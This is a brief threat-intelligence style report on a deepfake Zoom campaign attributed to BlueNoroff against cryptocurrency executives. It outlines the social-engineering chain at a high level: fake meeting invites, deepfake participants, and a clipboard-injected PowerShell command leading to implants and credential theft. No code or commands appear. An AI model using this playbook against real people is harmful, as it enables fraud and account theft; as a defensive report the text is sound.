BlueNoroff Deepfake Zoom Attack: 100 Crypto CEOs Compromised

In April 2026, a report revealed that a sophisticated deepfake campaign had compromised over 100 cryptocurrency executives and Web3 founders.

What happened

The attack, attributed to BlueNoroff, involved a fake Zoom campaign that achieved full system compromise in under five minutes. The attackers combined AI-generated deepfake participants with a technique called ClickFix clipboard injection. Months before the attack, the victim would receive a Calendly invite from an attacker posing as a legal professional. The Google Meet link would be replaced with a typo-squatted Zoom URL. The fake Zoom meeting room was populated with stolen webcam footage from prior victims, AI-generated still images, and deepfake composite videos. The attack exfiltrated the victim's webcam feed, and used a fake update overlay to inject a malicious PowerShell command via the clipboard. This resulted in a persistent C2 implant and the deployment of several post-exploitation modules including credential stealers and a Telegram session hijacker.